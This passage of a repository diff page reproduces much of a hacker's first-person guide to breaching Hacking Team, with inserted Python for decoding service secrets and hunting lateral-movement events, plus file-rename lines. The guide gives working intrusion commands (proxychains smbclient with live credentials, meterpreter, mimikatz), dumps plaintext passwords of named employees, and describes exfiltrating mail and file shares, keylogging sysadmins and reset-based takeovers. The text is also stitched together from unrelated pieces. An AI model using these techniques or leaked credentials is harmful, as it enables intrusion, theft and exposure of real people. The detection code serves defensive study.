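    return data.decode("utf-16-le").rstrip("\x00")


# Fallback for blobs whose layout you do not know: every printable UTF-16LE run
# of four or more characters.
UTF16_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){4,}")


def utf16_strings(blob):
    return [m.group().decode("utf-16-le") for m in UTF16_RUN.finditer(blob)]


if __name__ == "__main__":
    blob = hexdump_to_bytes(SC_DUMP)
    print(decode_sc_secret(blob))   # the besadmin password shown in the text
    print(utf16_strings(blob))
```

Service account secrets are stored this way because the Service Control Manager has to hand the plaintext to the logon API when it starts the service; that is why a registry backup from a retired server still yields a usable password rather than a hash, and why the password's age (a 2014 backup, still valid in 2015) is the real finding.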
I used proxychains [2] with the socks server on the embedded device and
smbclient [3] to check the password:
proxychains smbclient '//$' -U 'hackingteam.local/besadmin%bes32678!!!'
It worked! The password for besadmin was still valid, and a local admin. I
used my proxy and metasploit's psexec_psh [4] to get a meterpreter session.
Then I migrated to a 64 bit process, ran "load kiwi" [5], "creds_wdigest", and
got a bunch of passwords, including the Domain Admin:
HACKINGTEAM BESAdmin bes32678!!!
HACKINGTEAM Administrator uu8dd8ndd12!
HACKINGTEAM c.pozzi P4ssword <---- lol great sysadmin
HACKINGTEAM m.romeo ioLK/(90
HACKINGTEAM l.guerra 4luc@=.=
HACKINGTEAM d.martinez W4tudul3sp
HACKINGTEAM g.russo GCBr0s0705!
HACKINGTEAM a.scarafile Cd4432996111
HACKINGTEAM r.viscardi Ht2015!
HACKINGTEAM a.mino A!e$$andra
HACKINGTEAM m.bettini Ettore&Bella0314
HACKINGTEAM m.luppi Blackou7
HACKINGTEAM s.gallucci 1S9i8m4o!
HACKINGTEAM d.milan set!dob66
HACKINGTEAM w.furlan Blu3.B3rry!
HACKINGTEAM d.romualdi Rd13136f@#
HACKINGTEAM l.invernizzi L0r3nz0123!
HACKINGTEAM e.ciceri 2O2571&2E
HACKINGTEAM e.rabe erab@4HT!
--[ 11 - Downloading the mail ]-------------------------------------------------
With the Domain Admin password, I have access to the email, the heart of the
company. Since with each step I take there's a chance of being detected, I
start downloading their email before continuing to explore. Powershell makes
it easy [1]. Curiously, I found a bug with Powershell's date handling. After
downloading the emails, it took me another couple weeks to get access to the
source code and everything else, so I returned every now and then to download
the new emails. The server was Italian, with dates in the format
day/month/year. I used:
-ContentFilter {(Received -ge '05/06/2015') -or (Sent -ge '05/06/2015')}
with New-MailboxExportRequest to download the new emails (in this case all
mail since June 5). The problem is it says the date is invalid if you
try a day larger than 12 (I imagine because in the US the month comes first
and you can't have a month above 12). It seems like Microsoft's engineers only
test their software with their own locale.
--[ 12 - Downloading Files ]----------------------------------------------------
Now that I'd gotten Domain Admin, I started to download file shares using my
proxy and the -Tc option of smbclient, for example:
proxychains smbclient '// DiskStation' \
-U 'HACKINGTEAM/Administrator%uu8dd8ndd12!' -Tc FAE_DiskStation.tar '*'
I downloaded the Amministrazione, FAE DiskStation, and FileServer folders in
the torrent like that.
--[ 13 - Introduction to hacking windows domains ]------------------------------
Before continuing with the story of the "weones culiaos" (Hacking Team), I
should give some general knowledge for hacking windows networks.
----[ 13.1 - Lateral Movement ]-------------------------------------------------
I'll give a brief review of the different techniques for spreading within a
windows network. The techniques for remote execution require the password or
hash of a local admin on the target. By far, the most common way of obtaining
those credentials is using mimikatz [1], especially sekurlsa::logonpasswords
and sekurlsa::msv, on the computers where you already have admin access. The
techniques for "in place" movement also require administrative privileges
(except for runas). The most important tools for privilege escalation are
PowerUp [2], and bypassuac [3].
Remote Movement:
1) psexec
The tried and true method for lateral movement on windows. You can use
psexec [1], winexe [2], metasploit's psexec_psh [3], Powershell Empire's
invoke_psexec [4], or the builtin windows command "sc" [5]. For the
metasploit module, powershell empire, and pth-winexe [6], you just need the
hash, not the password. It's the most universal method (it works on any
windows computer with port 445 open), but it's also the least stealthy.
Event type 7045 "Service Control Manager" will appear in the event logs. In
my experience, no one has ever noticed during a hack, but it helps the
investigators piece together what the hacker did afterwards.
2) WMI
The most stealthy method. The WMI service is enabled on all windows
computers, but except for servers, the firewall blocks it by default. You
can use wmiexec.py [7], pth-wmis [6] (here's a demonstration of wmiexec and
pth-wmis [8]), Powershell Empire's invoke_wmi [9], or the windows builtin
wmic [5]. All except wmic just need the hash.
3) PSRemoting [10]
It's disabled by default, and I don't recommend enabling new protocols.
But, if the sysadmin has already enabled it, it's very convenient,
especially if you use powershell for everything (and you should use
powershell for almost everything, it will change [11] with powershell 5 and
windows 10, but for now powershell makes it easy to do everything in RAM,
avoid AV, and leave a small footprint)
4) Scheduled Tasks
You can execute remote programs with at and schtasks [5]. It works in the
same situations where you could use psexec, and it also leaves a well known
footprint [12].
5) GPO
If all those protocols are disabled or blocked by the firewall, once you're
Domain Admin, you can use GPO to give users a login script, install an msi,
execute a scheduled task [13], or, like we'll see with the computer of
Mauro Romeo (one of Hacking Team's sysadmins), use GPO to enable WMI and
open the firewall.
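The footprints named in the list above (the 7045 "Service Control Manager" event that psexec-style tools leave, and the scheduled-task trail of at/schtasks) are exactly what investigators reconstruct afterwards, so it is worth seeing what a hunt over those events looks like. The following is an added example, not code from the guide: it runs a few detection rules over event records shaped like the System 7045 and Security 4698 events a SIEM would present. The records are constructed for the example; the service names and the encoded-PowerShell stub are made up, and the psexec_psh image path is an approximation of that module's style rather than a captured value.

```python
import re

# Constructed event records (not real logs), flattened the way a SIEM shows
# System 7045 (service installed) and Security 4698 (scheduled task created).
SAMPLE_EVENTS = [
    {"EventID": 7045, "Computer": "ws01", "ServiceName": "PSEXESVC",
     "ImagePath": r"%SystemRoot%\PSEXESVC.exe"},
    {"EventID": 7045, "Computer": "ws02", "ServiceName": "vMbZwQfU",
     "ImagePath": r"%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e SQBFAFgAIAAoAE4A"},
    {"EventID": 7045, "Computer": "ws02", "ServiceName": "WdNisDrv",
     "ImagePath": r"system32\drivers\WdNisDrv.sys"},          # benign driver install
    {"EventID": 4698, "Computer": "srv01", "TaskName": r"\At1",
     "Command": r"cmd.exe /c whoami > C:\Windows\Temp\o.txt"},
    {"EventID": 4698, "Computer": "srv01",
     "TaskName": r"\Microsoft\Windows\Defrag\ScheduledDefrag",
     "Command": r"%windir%\system32\defrag.exe"},             # benign built-in task
]

# powershell[.exe] ... -e/-ec/-enc/-EncodedCommand <base64>
ENCODED_PS = re.compile(r"powershell(?:\.exe)?\b.*\s-(?:e|ec|enc|encodedcommand)\s", re.I)
# at.exe names its jobs \At1, \At2, ...
AT_JOB = re.compile(r"^\\At\d+$")


def classify(ev):
    """Name the lateral-movement footprint an event matches, or None."""
    if ev.get("EventID") == 7045:
        name = ev.get("ServiceName", "")
        path = ev.get("ImagePath", "")
        if name.upper() == "PSEXESVC" or "PSEXESVC" in path.upper():
            return "7045 sysinternals psexec service"
        if path.upper().startswith("%COMSPEC%") or ENCODED_PS.search(path):
            return "7045 service runs cmd/encoded powershell (psexec_psh style)"
    elif ev.get("EventID") == 4698:
        if AT_JOB.match(ev.get("TaskName", "")):
            return "4698 at.exe job"
        if ENCODED_PS.search(ev.get("Command", "")):
            return "4698 task runs encoded powershell"
    return None


def hunt(events):
    """Return (rule, event) pairs for every event that matches a rule."""
    hits = []
    for ev in events:
        rule = classify(ev)
        if rule:
            hits.append((rule, ev))
    return hits


if __name__ == "__main__":
    for rule, ev in hunt(SAMPLE_EVENTS):
        print(f"{ev['Computer']}: {rule}")
```

Two caveats a defender needs: 7045 is written on the target machine only, so it has to be forwarded centrally to be of any use, and 4698 is only logged when "Audit Other Object Access Events" is enabled in the audit policy. Both match the text's point that the footprint is rarely noticed live but is there for the investigation afterwards.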
"In place" Movement:
1) Token Stealing
Once you have admin access on a computer, you can use the tokens of the
other users to access resources in the domain. Two tools for doing this are
incognito [1] and the mimikatz token::* commands [2].
2) MS14-068
You can take advantage of a validation bug in Kerberos to generate Domain
Admin tickets [3][4][5].
3) Pass the Hash
If you have a user's hash, but they're not logged in, you can use
sekurlsa::pth [2] to get a ticket for the user.
4) Process Injection
Any RAT can inject itself into other processes. For example, the migrate
command in meterpreter and pupy [6], or the psinject [7] command in
powershell empire. You can inject into the process that has the token you
5) runas
This is sometimes very useful since it doesn't require admin privileges.
The command is part of windows, but if you don't have a GUI you can use
powershell [8].
----[ 13.2 - Persistence ]------------------------------------------------------
Once you have access, you want to keep it. Really, persistence is only a
challenge for assholes like Hacking Team who target activists and other
individuals. To hack companies, persistence isn't needed since companies never
sleep. I always use Duqu 2 style "persistence", executing in RAM on a couple
high-uptime servers. On the off chance that they all reboot at the same time,
I have passwords and a golden ticket [1] as backup access. You can read more
about the different techniques for persistence in windows here [2][3][4]. But
for hacking companies, it's not needed and it increases the risk of detection.
----[ 13.3 - Internal reconnaissance ]------------------------------------------
The best tool these days for understanding windows networks is Powerview [1].
It's worth reading everything written by its author [2], especially [3], [4],
[5], and [6]. Powershell itself is also quite powerful [7]. As there are still
many windows 2000 and 2003 servers without powershell, you also have to learn
the old school [8], with programs like netview.exe [9] or the windows builtin
"net view". Other techniques that I like are:
1) Downloading a list of file names
With a Domain Admin account, you can download a list of all filenames in
the network with powerview:
Invoke-ShareFinderThreaded -ExcludedShares IPC$,PRINT$,ADMIN$ |
select-string '^(.*) \t-' | %{dir -recurse $_.Matches[0].Groups[1] |
select fullname | out-file -append files.txt}
Later, you can read it at your leisure and choose which files to download.
2) Reading email
As we've already seen, you can download email with powershell, and it has a
lot of useful information.
3) Reading sharepoint
It's another place where many businesses store a lot of important
information. It can also be downloaded with powershell [10].
4) Active Directory [11]
It has a lot of useful information about users and computers. Without being
Domain Admin, you can already get a lot of info with powerview and other
tools [12]. After getting Domain Admin, you should export all the AD
information with csvde or another tool.
5) Spy on the employees
One of my favorite hobbies is hunting sysadmins. Spying on Christian Pozzi
(one of Hacking Team's sysadmins) gave me access to a Nagios server which
gave me access to the rete sviluppo (development network with the source
code of RCS). With a simple combination of Get-Keystrokes and
Get-TimedScreenshot from PowerSploit [13], Do-Exfiltration from nishang
[14], and GPO, you can spy on any employee, or even on the whole domain.
--[ 14 - Hunting Sysadmins ]----------------------------------------------------
Reading their documentation about their infrastructure [1], I saw that I was
still missing access to something important - the "Rete Sviluppo", an isolated
network with the source code for RCS. The sysadmins of a company always have
access to everything, so I searched the computers of Mauro Romeo and Christian
Pozzi to see how they administer the Sviluppo network, and to see if there
were any other interesting systems I should investigate. It was simple to
access their computers, since they were part of the windows domain where I'd
already gotten admin access. Mauro Romeo's computer didn't have any ports
open, so I opened the port for WMI [2] and executed meterpreter [3]. In
addition to keylogging and screen scraping with Get-Keystrokes and
Get-TimedScreenshot, I used many /gather/ modules from metasploit, CredMan.ps1
[4], and searched for interesting files [5]. Upon seeing that Pozzi had a
Truecrypt volume, I waited until he'd mounted it and then copied off the
files. Many have made fun of Christian Pozzi's weak passwords (and of
Christian Pozzi in general, he provides plenty of material [6][7][8][9]). I
included them in the leak as a false clue, and to laugh at him. The reality is
that mimikatz and keyloggers view all passwords equally.
--[ 15 - The bridge ]-----------------------------------------------------------
Within Christian Pozzi's Truecrypt volume, there was a textfile with many
passwords [1]. One of those was for a Fully Automated Nagios server, which had
access to the Sviluppo network in order to monitor it. I'd found the bridge I
needed. The textfile just had the password to the web interface, but there was
a public code execution exploit [2] (it's an unauthenticated exploit, but it
requires that at least one user has a session initiated, for which I used the
password from the textfile).
--[ 16 - Reusing and resetting passwords ]--------------------------------------
Reading the emails, I'd seen Daniele Milan granting access to git repos. I
already had his windows password thanks to mimikatz. I tried it on the git
server and it worked. Then I tried sudo and it worked. For the gitlab server
and their twitter account, I used the "forgot my password" function along with
my access to their mail server to reset the passwords.
--[ 17 - Conclusion ]-----------------------------------------------------------
That's all it takes to take down a company and stop their human rights abuses.
That's the beauty and asymmetry of hacking: with 100 hours of work, one person
can undo years of work by a multi-million dollar company. Hacking gives the
underdog a chance to fight and win.
Hacking guides often end with a disclaimer: this information is for
educational purposes only, be an ethical hacker, don't attack systems you
don't have permission to, etc. I'll say the same, but with a more rebellious
conception of "ethical" hacking. Leaking documents, expropriating money from
banks, and working to secure the computers of ordinary people is ethical
hacking. However, most people that call themselves "ethical hackers" just work
to secure those who pay their high consulting fees, who are often those most
deserving to be hacked.
Hacking Team saw themselves as part of a long line of inspired Italian design
[1]. I see Vincenzetti, his company, his cronies in the police, Carabinieri,
and government, as part of a long tradition of Italian fascism. I'd like to
dedicate this guide to the victims of the raid on the Armando Diaz school, and
to all those who have had their blood spilled by Italian fascists.
--[ 18 - Contact ]--------------------------------------------------------------
To send me spear phishing attempts, death threats in Italian [1][2], and to
give me 0days or access inside banks, corporations, governments, etc.
only encrypted email please:
If not you, who? If not now, when?
_ _ _ ____ _ _
| | | | __ _ ___| | __ | __ ) __ _ ___| | _| |
| |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / |
| _ | (_| | (__| < | |_) | (_| | (__| <|_|
|_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)

Draft/Draft/Home → Draft/Home

Draft/Draft/Honeypots → Draft/Honeypots

Draft/Draft/Interesting Things Useful → Draft/Interesting Things Useful

Draft/Draft/Interesting Things Useful stuff/Writeup of Gamma Group → Draft/Interesting Things Useful stuff/Writeup of Gamma Group Hack.txt

+ 7
- 0
Draft/Internet of

@ -0,0 +1,7 @@
##Internet of Things
###Security not included.
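Review bot: the two heading lines in this new file, `##Internet of Things` and `###Security not included.`, have no space between the hash marks and the text, so a CommonMark renderer (which Gogs/Gitea use for markdown) shows them as literal `##...` text rather than as headings; write them as `## Internet of Things` and `### Security not included.`.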

Draft/Draft/ → Draft/

Draft/Draft/Lockpicking → Draft/Lockpicking

Draft/Draft/ → Draft/

Draft/Draft/Malware/Detect Virtualbox C → Draft/Malware/Detect Virtualbox C prog.txt